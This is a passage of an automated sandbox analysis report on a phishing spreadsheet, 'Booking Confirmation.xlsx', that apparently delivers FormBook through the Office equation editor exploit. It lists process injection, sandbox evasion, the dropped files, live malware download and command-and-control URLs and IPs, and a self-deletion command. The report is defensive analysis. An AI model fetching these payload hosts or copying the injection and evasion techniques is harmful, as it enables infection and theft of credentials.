            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CEA5 push eax; ret 5_2_0041CEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041CF5C push eax; ret 5_2_0041CF62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0091DFA1 push ecx; ret 5_2_0091DFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7DFA1 push ecx; ret 7_2_01F7DFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_001369BB push esi; ret 7_2_001369BC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0012AB07 push ds; retf 7_2_0012AB09
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00134E05 push ss; retf 7_2_00134E06
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEA5 push eax; ret 7_2_0013CEF8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEF2 push eax; ret 7_2_0013CEF8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CEFB push eax; ret 7_2_0013CF62
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0013CF5C push eax; ret 7_2_0013CF62
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01E6E3E6 pushad ; ret 7_2_01E6E3E7
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23266199922
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23266199922
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: Booking Confirmation.xlsxStream path 'EncryptedPackage' entropy: 7.99989686385 (max. 8.0)

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2884, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000001298E4 second address: 00000000001298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000129B4E second address: 0000000000129B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2300Thread sleep time: -360000s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2944Thread sleep time: -51520s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2424Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1920Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exe TID: 3008Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.2197981181.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
            Source: explorer.exe, 00000006.00000000.2197956072.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
            Source: explorer.exe, 00000006.00000000.2205247966.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.2197961773.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
            Source: explorer.exe, 00000006.00000000.2197918909.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000006.00000002.2378407357.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
            Source: vbc.exe, 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0040ACC0 LdrLoadDll,5_2_0040ACC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]5_2_009226F8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F826F8 mov eax, dword ptr fs:[00000030h]7_2_01F826F8
            Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 216.130.188.93 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388Jump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1388Jump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 9A0000Jump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.2191659808.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.2192054318.00000000006F0000.00000002.00000001.sdmp, raserver.exe, 00000007.00000002.2378520807.00000000009C0000.00000002.00000001.sdmpBinary or memory string: !Progman
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection712LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information41DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323046 Sample: Booking Confirmation.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 39 www.akmh.pro 2->39 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 15 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 47 workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu 103.125.191.5, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 11->47 33 C:\Users\user\AppData\...\svchost[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 11->18         started        37 C:\Users\user\...\~$Booking Confirmation.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Writes to foreign memory regions 18->51 53 Injects a PE file into a foreign processes 18->53 21 RegSvcs.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 2 other signatures 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 affinitymotorsales.com 216.130.188.93, 49166, 80 WEBAIR-INTERNETUS United States 24->41 43 setyourhead.com 34.102.136.180, 49167, 80 GOOGLEUS United States 24->43 45 2 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 raserver.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Booking Confirmation.xlsx31%VirustotalBrowse
            Booking Confirmation.xlsx25%ReversingLabsDocument-Word.Trojan.Phishing

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe25%ReversingLabsWin32.Trojan.Wacatac
            C:\Users\Public\vbc.exe25%ReversingLabsWin32.Trojan.Wacatac

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.RegSvcs.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            setyourhead.com1%VirustotalBrowse
            workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe100%Avira URL Cloudmalware
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
